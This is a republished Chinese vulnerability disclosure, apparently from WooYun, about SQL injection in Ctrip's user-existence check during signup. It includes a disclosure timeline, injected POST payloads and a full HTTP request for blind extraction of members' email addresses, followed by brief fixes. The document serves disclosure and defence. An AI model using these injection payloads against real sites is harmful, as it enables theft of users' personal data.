menu
  • 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

携程网某ajax验证存在sql注入

武飞扬头像
Sword-heart
帮助2

漏洞详情

披露状态:

2010-07-30: 细节已通知厂商并且等待厂商处理中
2010-07-30: 厂商已经确认,细节仅向厂商公开
2010-08-09: 细节向核心白帽子及相关领域专家公开
2010-08-19: 细节向普通白帽子公开
2010-08-29: 细节向实习白帽子公开
2010-08-29: 细节向公众公开

简要描述:

位置较敏感,发生在members表,可以发现表的一些字段,能够窃取任何人的包括email等信息,未深入测试

详细说明:

用户注册时,"验证用户是否存在"因过滤不严谨导致sql注入
另外:
http://www.ctrip.com/robots.txt
http://destguides.ctrip.com/destguides/journals/AllSingleJournals.aspx?Writing=130079''3
暴露了敏感信息

漏洞证明:

http://www.ctrip.com/member/CheckUser.asp
post: signup_uid=xyyxx1x'/**/order/**/by/**/1--
post: signup_uid=xyyxx1x'/**/order/**/by/**/uid--
post: signup_uid=xyyxx1x'/**/order/**/by/**/email--
尝试不正确的字段导致不同结果,输入".`"等字符及其它注入手段测试(可能存在ids)

  1.  
    POST /member/CheckUser.asp HTTP/1.1
  2.  
    Accept: */*
  3.  
    Accept-Language: en-US,zh-cn;q=0.5
  4.  
    Referer: http://www.ctrip.com/member/signup.asp
  5.  
    If-Modified-Since: Thu Jan 1 08:00:00 UTC 0800 1970
  6.  
    Content-Type: application/x-www-form-urlencoded
  7.  
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)
  8.  
    Host: www.ctrip.com
  9.  
    Content-Length: 94
  10.  
    Connection: Keep-Alive
  11.  
    Cache-Control: no-cache
  12.  
    Cookie:
  13.  
    signup_uid=jquery1'/*and*/and/**/sUbstRing(email,1,1)=char(0)/**/order/**/by/*and 1=1*/email--

修复方案:

1.白名单验证
2.屏蔽或友好提示错误

版权声明:转载请注明来源 路人甲@乌云

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhckejga
系列文章
更多 icon
同类精品
更多 icon
继续加载
友情链接: 申请要求:权重≥3,IP≥1000,内容属同类网站; 申请邮件: luke.wu●vfv.cc 友情链接交换群: 友情链接交换群
外链价格: 【首页 30/月 - 300/年】【内页 50/月 - 500/年】【全站 70/月 - 700/年】 购买外链请加QQ群: 站长交流群